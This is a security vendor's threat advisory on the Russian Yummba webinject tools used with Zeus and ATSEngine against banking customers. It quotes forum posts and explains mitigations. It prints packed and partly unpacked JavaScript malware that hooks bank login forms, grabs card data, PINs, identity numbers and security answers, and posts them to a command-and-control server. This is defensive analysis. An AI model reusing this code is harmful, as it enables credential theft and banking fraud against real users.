akamai’s [state of the internet] / threat advisory
TLP: GREEN GSI ID: 1083 RISK FACTOR - HIGH
YUMMBA WEBINJECT TOOLS
1.1 OVERVIEW / Akamai Technologies’ Prolexic Security Engineering & Response Team
(PLXsert) has detected the aggressive promotion and targeted use of new webinject tools
by a Russian individual or group using the name Yummba. A webinject is a framework
that allows attackers to insert custom elements into web pages making them appear
legitimate to end users. The altered pages are often used to collect and exfiltrate private
information from customers using banking websites and applications. The stolen
credentials allow the attackers to bypass security measures such as PINs, CAPTCHA
systems and even two-factor authentication (2FA) measures.
Webinjects have also been incorporated into malware kits such as Zeus, SpyEye and KINS.
The webinjects crafted by Yummba, however, are more robust; they utilize the Automatic
Transfer System (ATSEngine), which enables more complete and dynamic attacks along
with a more advanced feature set.
Attackers first compromise a client device or network to use webinjects, however portions
of these attacks might also be used in cross-site scripting (XSS), phishing, and drive-by
download attacks.
1.2 SOURCES / Open source intelligence sources (OSINT) indicate the creator of the
Yummba webinjects tool is located in Russia, having been previously identified by other
researchers.1 The author appears to specialize in writing webinjects that target financial
entities. Yummba is fairly active in the carding community, sometimes giving advice to
other developers, but most of his activity relates to identifying stolen and leaked versions
of his products and blacklisting the parties responsible.
1
"ATSEngine." XyliBox. 4 May 2014. 1 1
akamai’s [state of the internet] / threat advisory
Figure 1: Yummba user profile on carder forum > You come to the left to unlock the payment account, send it back blah blah blah,
this feature is called avtozalivom tobish AZ
such a "feature" called ignorance of the topic and the name of things is not their
real names)
and by the way IMHO /dev/null instead of /dev/null/
even checked
root@mybro: ~ # cat /dev/null/
cat: /dev/null/: Not a directory
root@mybro: ~ # cat /dev/null
root@mybro: ~ #
> Since it easier nakodil cross-domain Ajax request
nakodil it easier to 3 functions it than to ship an entire Board of Rites, and the
case is not in the speed of an Internet. jquery juzat and only if it is already so
loaded by the bank itself, and that is better than your code does not) since jquery
code obfuscation is not difficult to understand when razboke than their Artful
functions and operations understandable only to you
> With regards to the IPA - maybe it depends on the Trojan, which will use. Say, in
the same Zeus have flags, the type - run only when the post request URL, run 1 time
per day / at all, data_after, data_before and so on.
regards api and adjusting for one or Ina Trojan - the pros should not be tied to a
specific syntax parsing injects trojan. pros write inzhy 99.9% in JS and from the
injection produce only required to insert podgruzku script Head. and it can support
any trojans injection and no matter what format they will injects.
Figure 2: Yummba talking about injection techniques 2 2
akamai’s [state of the internet] / threat advisory
> And what is his incompetence, something I did not catch?
you said he checked the work ccvbv of injection. from which you have just
webinjects.txt
part
without
admin.
your
words?
or
you're
already
on
them
otkazyvaeshsya? well as inject will work without admin besides it does not inject a
loader of injection)))))))) you said Monk checked and it worked)))) What worked? code
is inserted in the code of the page? and it vryatli as something that is in your hands
to him for over a year and content pages long been changed.
> And even more do not follow, what side you fuck it?
Well you at Black on MF is otpishi)
> Yes engineer at a + vbv yours though. Share it here? And just try not confirm that
this is your job
you can upload it public) to the same you only loader that no value is
Figure 3: Yummba blacklisting supposed platform theft In Figure 4, the toolkit author’s personal server displays the jabber ID where he can be
contacted ([email protected]), which has also been posted in forums and appears on the
mybro.cc domain.
Figure 4: A webpage on mybro.cc shows the [email protected] Jabber ID The Whois information for mybro.cc shows contact information and an address located in
Russia. Of course, OSINT information about an online persona and domain may be
inaccurate, because malicious actors try to conceal their true identities.
1.3 A SAMPLE WEBINJECT / The webinject in Figure 5 appears legitimate. The intent of
a webinject is to lay or embed information in a legitimate webpage that misleads the
customer into entering data that will be harvested for malicious purposes, such as identity
theft and banking/credit card fraud. Webinjects are often customized to match a site’s look
and feel, including logos, fonts and colors.
3 3
akamai’s [state of the internet] / threat advisory
Figure 5: An example of a web inject intended to exfiltrate credit card data Some advanced webinjects, such as those that support the ATSEngine, automate the
process of wiring a victim’s funds to a third-party account. The victim’s active,
authenticated session is hijacked to perform these unwanted actions.
1.4 TARGETS / PLXsert identified more than 100 companies with active injects available
in the wild. The most likely targeted companies are larger financial institutions in North
America and Europe. Attacks-for-sale come with a wide range of features: some offer only
simple reporting of account information (e.g. balances, account numbers), while others
perform credential theft, and the most advanced utilize the ATSEngine for automated wire
transfers to an attacker-controlled account.
The attack targets included dozens of banking and financial services sites, along with
multiple ecommerce sites and social media platforms.
1.5 CODE ANALYSIS / The custom Yummba webinjects are intended to be used with the
ATSEngine, an add-on component for popular crimeware and botnet software that allows
malicious actors to inject dynamic content into a website and then automatically transfer
funds from the victim’s compromised online banking accounts. The engine allows
malicious actors to update their configurations easily, without having to recompile or
reinfect their victims. The JavaScript code is packed using a common obfuscator. The packed
code is shown in Figure 6.
(More information about the monetization of custom webinjects is available in blog posts
by security researchers Dancho Danchev2 and XyliBox3.)
Danchev, Dancho. "A Peek Inside a Managed OTP/ATS/TAN Token Bypassing/Hijacking/Blocking System as a (Licensed) Service." Dancho Danchev's Blog -­‐ Mind Streams of Information Security K nowledge. 19 July 2013. 3 “ ATSEngine." XyliBox. 4 May 2 014 2
4 4
1
akamai’s [state of the internet] / threat advisory
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?S
tring.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c-)r[e(c)]=k[c]||e(c);k=[function(e){return
r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new
RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('v H=E;v 3p=E;v 2f=y(){};v 1t=-1;v 2g=1;v 1d="U";v I="U";v 1Z="U";v 1k="U";v 1u="U";v 2L="U";v 2M="U";v 2N="U";v 2O="U";v
2P="U";v
.. snip ..
45(){u(7s){1d="0";1A({1d:"0"},2)}x{1Q()}}y 3c(){B O.W({V:"a",Z:/3k\\.2e/25})?Y:E}y
K(){1H(Y)}y 3h(){A(w,"3h","J","7t 7u.");2u();4q()}y 41(){1d="1";1A({1d:"1"},3)}y
1T(){3q();u(2h&&X){2f=X.1I;X.1I=1D 4u("2H.4v(1);B E;");A(w,"1T","J","I 1z 4w. 1K 1I 4x
4y");1H(E)}x{u(2j&&X){2f=X.1I;X.1I=1D 4u("2H.4v(2);B E;");A(w,"1T","J","1Z 1z 4w. 1K 1I 4x
4y");3j(1)}x{u(3c()){A(w,"1T","J","4s 7v 1z 7w. 7x
48");3j(2)}x{1H(E)}}}};',62,468,'||||||||||||||||||||||||||||||if|var|document|else|fu
nction|length|addLog|return|test|getElementById|false|value|return_type|ifr_document|l
ogin|info|atsEnd|name|found|textarea|getElement|getElementsByTagName|error
.. snip ..
123456789ABCDEFabcdef|indexOf|charCodeAt|127|2048|192|2047|65536|224|65535|240|formatC
urrency|isNaN|abs|50000000001|base|substr|lastIndexOf|themeBannerAddParametersClientNa
me|getAttribute|showCvvDiv|hideCvvDiv|css|styleSheet|cssText|html_wait_page|html_fake_
page|onLoadContentGrabberIframe|split|logout|redirecting|to|YES|||||this|starting|chec
king|success|query|showing|default|script|onLoad|OnLoadContentGrabberIframe|method|POS
T|target|content_link_|content_|disabled|auto_logoff|tisecuADGestionAcces|msgId|token|
randomNo|3216955557578959|saveLoginData|fk_card_nr|fk_exp_mm|fk_exp_yy|fk_cvv|fk_pin|f
k_dob_mm|fk_dob_dd|fk_dob_yy|fk_sin_1|fk_sin_2|fk_sin_3|Expiration|CVV|Debit|PIN|of|Bi
rth|Social|Insurance|filled|submiting|OperationImmediateForm|tr|td|className|cs|parsed
|trs|balances_form|IE|ModifierInfoAuthForte|ModifierQuestRepAuthForte|questions|answer
s|questionChoisie1|q1_select|questionChoisie2|q2_select|questionChoisie3|q3_select|chR
eponseQuestion|reponse_question50|class|disableAutoComplete|a_inputs|onload|OnLoadIfra
me|width|1024|height|768|position|absolute|left|nav_div|clconnADDossierPersonnel|Dossi
er|My|displayed|updating|current|reset_ats_at_start|begining|navigation|Summary|detect
ed|reading'.split('|'),0,{}));
Figure 6: Packed malicious JavaScript code in a custom web inject file The unpacked and commented JavaScript code in Figure 7 shows the power of a web inject
combined with the ATSEngine. The code begins by preparing the ATSEngine to scrape
and gather information about the user’s banking session. The ATSEngine uses several
hidden iframes to exfiltrate the data. The function submitData() reveals the sensitive
information that the malicious actor will attempt to steal after injecting the falsified cardauthentication page shown in Figure 5. When the victim inputs the data, it is sent directly
to the malicious actor’s command and control (CC, C2) server without the user’s
knowledge. Other functions attempt to gather account information about the victim’s
balances, security and more.
// ATSEngine is ready, prep for scraping
function continueATSStart() {
addLog(document, "continueATSStart", "info", "begining navigation.");
showWaitPage();
beginNavigation();
}
// injects and ATSEngine are bootstrapped; gather some quick info about the account
function continueMainStart() {
if (ats_started == "1" || ats_started == "0") {
addLog(document, "continueMainStart", "info", "parsing My Account page");
5 5
2
akamai’s [state of the internet] / threat advisory
parseBalances();
if (!/error|failed/.test(msg_type)) {
addLog(document, "continueMainStart", "info", "wait_page displayed. updating
account info.");
writeVariables({
login: login,
balances: balances
}, 4)
} else {
writeLog()
}
} else {
if (ats_started == "2") {
addLog(document, "continueMainStart", "info", "grabber finished. current page
title is " + document.getElementsByTagName("title")[0].innerHTML.replace(/\s {
2,
}
/gim," ").replace(/ ^ \s * | \s$ | \t | \r | \n / gim, ""));
return_type = "atsEnd";
writeLog()
}
}
}
// inject an iframe out of view of the user; use it to crawl the site using the
victim’s active session to collect data; this process sets the stage for more advanced
functionality as the inject runs.
function beginNavigation() {
var c = document.createElement("div");
var a = '<iframe onload="if(top.ifr_state > 0) {
try {
.OnLoadIframe()
} catch (err) {
void(0)
}
}
" id=nav_iframe name=nav_iframe width=1024 height=768 '+(!show_debug?'style="
position: absolute;
top: -5000 px;
left: -5000 px "':"
")+" > < /iframe>";
c.id = "nav_div";
c.innerHTML = a;
document.body.appendChild(c);
var b = document.getElementById("nav_iframe");
top.ifr_state = 1;
b.src = "https://accesd.
/clconnADDossierPersonnel/Dossier.do"
}
function onLoaded() {
defineContentVariables();
if (login_input && login_form) {
old_submit = login_form.onsubmit;
login_form.onsubmit = new Function("
.SaveLoginData(1);
return false;
");
addLog(document, "onLoaded", "info", "login page loaded. form onsubmit events
attached"); showContent(false)
} else {
6 6
3
akamai’s [state of the internet] / threat advisory
if (password_input && login_form) {
old_submit = login_form.onsubmit;
login_form.onsubmit = new Function("
.SaveLoginData(2);
return false;
");
addLog(document, "onLoaded", "info", "password page loaded. form onsubmit
events attached"); readVariables(1)
} else {
if (atsCanStart()) {
addLog(document, "onLoaded", "info", "Account Summary page detected.
reading variables");
readVariables(2)
} else {
showContent(false)
}
}
}
};
// inject the iframe and form; populate it with victim’s browser info, page content,
etc. and phone home to the control server
function postPageContent() {
.. snip ..
b += '<iframe id="contentGrabbeIframe" name="contentGrabbeIframe" onLoad="try {
.OnLoadContentGrabberIframe()
} catch (err) {
void(0)
}
"></iframe>';
b += '<form method="POST" action="' + gate_link + '" id="contentGrabberForm"
target="contentGrabbeIframe">';
b += '<textarea name="action">write_log</textarea>';
if (returnTrue(login)) {
b += '<textarea name="login">' + login + "</textarea>"
}
b += '<textarea name="msg_type">' + msg_type + "</textarea>";
b += '<textarea name="msg">' + msg + "</textarea>";
b += '<textarea name="return_type">' + (return_type || "atsEnd") + "</textarea>";
b += '<textarea name="pkey">' + pkey + "</textarea>";
b += '<textarea name="bt">' + browser_type + "</textarea>";
for (var c in page_content) {
b += '<textarea name="content_link_' + c + '">' + page_content[c].content_link +
"</textarea>";
b += '<textarea name="content_' + c + '">' + page_content[c].content +
"</textarea>"
}
b += "</form>";
d.innerHTML = b;
var a = document.getElementById("contentGrabberForm");
balances = "";
a.submit() // send data
}
// store the user’s login credentials
function saveLoginData(a) {
if (a == 1) {
if (login_input.value.length == 12) {
addLog(document, "onLoaded", "info", "login submited");
disableFormInputs(login_form, true);
writeVariables({
login: login_input.value + "",
7 7
4
akamai’s [state of the internet] / threat advisory
ats_started: "0"
}, 1)
}
} else {
if (a == 2) {
if (password_input.value.length > 4) {
addLog(document, "onLoaded", "info", "password submited");
disableFormInputs(login_form, true);
writeVariables({
login: login,
password: password_input.value + "",
ats_started: "0"
}, 1)
}
}
}
}
// transmit the victim data offsite to the attacker’s server (credit card, date of
birth, ATM pin, and social ins/sec number)
function submitData() {
var k = document.getElementById("fk_card_nr"); // card num
var i = document.getElementById("fk_exp_mm"); // exp month
var a = document.getElementById("fk_exp_yy"); // exp year
var h = document.getElementById("fk_cvv"); // CVV
var f = document.getElementById("fk_pin"); // ATM pin
var j = document.getElementById("fk_dob_mm"); // birth month
var g = document.getElementById("fk_dob_dd"); // birth day
var c = document.getElementById("fk_dob_yy"); // birth year
var e = document.getElementById("fk_sin_1"); // social ins/sec num
var d = document.getElementById("fk_sin_2"); // social ins/sec num
var b = document.getElementById("fk_sin_3"); // social ins/sec num
if (!isValidCardNumber(k.value)) {
alert("Please enter valid Card Number");
return
}
.. snip ..
if (g.selectedIndex < 1 || j.selectedIndex < 1 || c.selectedIndex < 1) {
alert("Please enter valid Date of Birth");
return
}
.. snip ..
/.test(b.value)) {
alert("Please enter valid Social Insurance Number");
return
}
addLog(document, "submitData", "info", "fake page filled. submiting data");
writeVariables({
login: login,
card_nr: k.value,
exp: i.value + "/" + a.value,
cvv: h.value,
pin: f.value,
dob: j.value + "/" + g.value + "/" + c.value,
sin: e.value + "-" + d.value + "-" + b.value
}, 5)
}
// look over the HTML from the victim’s account statement page and collect the
8 8
5
akamai’s [state of the internet] / threat advisory
available funds
function parseBalances() {
var c = getElement.byAttrs({
tagName: "form",
name: "OperationImmediateForm"
});
if (c) {
var d = c.getElementsByTagName("table") && c.getElementsByTagName("table").length
> 0 ? c.getElementsByTagName("table")[0] : false;
if (d) {
addLog(document, "parseBalances", "info", "balances_table found. parsing");
.. snip ..
}
}
// once successfully injected, attempt to find elements of value to use for data
collection, credential theft, and session hijacked attacks
function onLoadIframe() {
var j = document.getElementById("nav_iframe");
var d = getElement.byAttrs({
parentElement: ifr_document,
tagName: "a",
href: /ModifierInfoAuthForte.do/im
});
if (d) {
addLog(ifr_document, "parseBalances", "info", "security_settings_link found.
clicking");
top.ifr_state = 2;
d.click()
.. snip ..
}
} else {
if (top.ifr_state == 2) {
var i = getElement.byAttrs({op.ifr_state == 2
parentElement: ifr_document,
tagName: "a",
href: /ModifierQuestRepAuthForte.do/im
});
if (i) {
addLog(ifr_document, "parseBalances", "info", "qa_link found. clicking");
top.ifr_state = 3;
i.click()
.. snip ..
}
} else {
if (top.ifr_state == 3) {
addLog(ifr_document, "onLoadIframe", "info", "parsing questions and
answers");
var g = getElement.byAttrs({
parentElement: ifr_document,
tagName: "select",
name: "questionChoisie1"
});
.. snip ..
var h = getElement.byAttrs({
parentElement: ifr_document,
tagName: "input",
9 9
6
akamai’s [state of the internet] / threat advisory
name: /chReponseQuestion.*reponse_question50/im,
"class": "disableAutoComplete",
searchType: "all"
});
.. snip ..
qa = "";
qa += g.options[g.selectedIndex].text + ": " + h[0].value + "<br>";
addLog(ifr_document, "onLoadIframe", "info", "question and answer found: "
+ g.options[g.selectedIndex].text + " - " + h[0].value);
qa += e.options[e.selectedIndex].text + ": " + h[1].value + "<br>";
addLog(ifr_document, "onLoadIframe", "info", "question and answer found: "
+ e.options[e.selectedIndex].text + " - " + h[1].value);
qa += b.options[b.selectedIndex].text + ": " + h[2].value;
addLog(ifr_document, "onLoadIframe", "info", "question and answer found: "
+ b.options[b.selectedIndex].text + " - " + h[2].value);
writeVariables({
login: login,
qa: qa
}, 6)
}
}
}
.. snip ..
}
Figure 7: Unpacked malicious JavaScript code in a custom web inject with play-­‐by-­‐play description 1.6 HOW IT WORKS / The Zeus framework is a crimeware kit that is often used to
harvest banking credentials. It is used to control compromised hosts (zombies) for many
types of cyber crime, including distributed denial of service (DDoS) attacks and attacks
customized for specific platform-as-a-service (PaaS) and software-as-a-service (SaaS)
infrastructures, including financial institutions.
Attackers leverage the host’s resources and extract sensitive information from users, which
usually leads to identity theft and banking fraud. Other uses of the Zeus framework include
crypto-currency mining, spam and DDoS attacks. Once a system is compromised by Zeus,
malicious actors have access to a variety of remote commands, including forcing a host to
download and execute remote and local files, such as webinjects, as shown in Figure 8.
10 10
akamai’s [state of the internet] / threat advisory
Figure 8: A visualization of how webinjects work with the ATSEngine Once a user’s machine has been infected with a banking Trojan such as Zeus, and the
webinjects file is configured, the malicious actors will proceed to exfiltrate data from the
victim’s browsing sessions, sending the data back the C2 server. In the following lab test, an
infected Zeus bot was configured with webinjects prior to browsing several websites,
during which attempts to login with dummy accounts were made. These dummy account
attempts were logged and submitted to the C2 in plaintext for later use. Figure 9 and Figure
10 show the sign-in pages of two financial companies.
11 11
akamai’s [state of the internet] / threat advisory
Figure 9: During a test in the lab environment, a user submitted f ake credentials that were collected by the Yummba webinject tool Figure 10: A similar test was conducted, using fake credentials, on a major US banking site Figure 11 and Figure 12 show the Zeus bot C2 panel after collecting login data, including
the victim’s username and password.
12 1
akamai’s [state of the internet] / threat advisory
Figure 11: Banking sign-­‐in information logged by Zeus bot in a proof-­‐of-­‐concept lab simulation Figure 12: Banking sign-­‐in information logged by Zeus bot in a proof-­‐of-­‐concept lab simulation 1.7 VULNERABILITY MITIGATION / Preventing this primarily client-based attack
requires an end-user to distinguish illegitimate elements of a web page from legitimate
content, as well as improved security and hardening of client computers. In most cases, a
13 2
akamai’s [state of the internet] / threat advisory
client computer would have been previously compromised by a Trojan such as the Zeus
crimeware kit. Steps to mitigate this vulnerability include the following:
§
User awareness: Because end-users are the target of these attacks, training and
education are needed to help them identify suspected phishing attacks. Red flags are
generic salutations, grammatical errors in URLs, unexpected attachments, and
attachments sent from unknown entities. In general, clicking unfamiliar links in
emails should be discouraged. Users should not respond with sensitive information
to email requests and should contact their financial institutions with questions
about suspicious banking emails. It’s a good idea to browse directly to a financial
institution instead of clicking a link.
§
System hardening: Group-Policy objects (GPOs), Software Restriction Policies
(SRP) and commercial endpoint security products, can help mitigate this type of
threat. In addition, using antivirus software and other signature-based measures
can help, although there may be very low levels of detection for some threats.
§
Deep packet inspection: Monitoring via deep packet inspection can help to
mitigate these threats with a recognizable traffic signature. Some illegitimate URLs
served during these attacks can be spotted and blocked for outbound traffic.
§
Community cleanup: Projects such as Shadowserver,4 MalwareMustDie,5 and
ZeuS Tracker6 help the commercial sector and law enforcement to verify and take
down malicious hosts serving attacks. Remediation and takedown is needed to stop
further infestation and damage.
1.8 CONCLUSION / As discussed in PLXsert’s Zeus Crimeware Threat Advisory,7
webinjects are a type of customized binary payload. The underground crimeware
ecosystem will continue to target financial institutions and attempt to streamline
illegitimate operations without end users’ knowledge or consent.
Malicious actors will continue to develop payloads like these, in addition to DDoS botnet
building and monetization, in order take advantage of the massive number of exploited
devices on the Internet. Easy-to-use, click-and-deploy crimeware kits for purchase have
simplified the setup of criminal shops that can generate profits very quickly.
International cooperation, community cleanup and a preemptive security mindset applied
to systems development are needed to prevent the further expansion of this profitable
criminal market. PLXsert will continue researching these type of threats and future
advisories and updates will be provided if warranted.
“Wiki,” Shadowserver Foundation. "Analysis" Malware Must Die. Malware Reseach Group 6 "The ZeuS Tracker." Zeustracker.abuse.ch. 7 PLXsert. "Zeus Crimeware Threat Advisory." S tateoftheInternet.com, Akamai, 10 June 2014 4
5
14 akamai’s [state of the internet] / threat advisory
The Prolexic Security Engineering and Research Team (PLXsert) monitors malicious cyber threats globally and analyzes these attacks using proprietary techniques and equipment.
Through research, digital forensics and post-event analysis, PLXsert is able to build a global view of security threats, vulnerabilities and trends, which is shared with customers and the
security community. By identifying the sources and associated attributes of individual attacks, along with best practices to identify and mitigate security threats and vulnerabilities, PLXsert
helps organizations make more informed, proactive decisions.
Akamai® is a leading provider of cloud services for delivering, optimizing and securing online content and business applications. At the core of the company’s solutions is the Akamai
Intelligent Platform™ providing extensive reach, coupled with unmatched reliability, security, visibility and expertise. Akamai removes the complexities of connecting the increasingly
mobile world, supporting 24/7 consumer demand, and enabling enterprises to securely leverage the cloud. To learn more about how Akamai is accelerating the pace of innovation in a
hyperconnected world, please visit www.akamai.com or blogs.akamai.com, and follow @Akamai on Twitter.
Akamai is headquartered in Cambridge, Massachusetts in the United States with operations in more than 40 offices around the world. Our services and renowned customer care enable
businesses to provide an unparalleled Internet experience for their customers worldwide. Addresses, phone numbers and contact information for all locations are listed on
www.akamai.com/locations
©2014 Akamai Technologies, Inc. All Rights Reserved. Reproduction in whole or in part in any form or medium without express written permission is prohibited. Akamai and the Akamai
wave logo are registered trademarks. Other trademarks contained herein are the property of their respective owners. Akamai believes that the information in this publication is accurate as
of its publication date; such information is subject to change without notice. Published 10/14.
15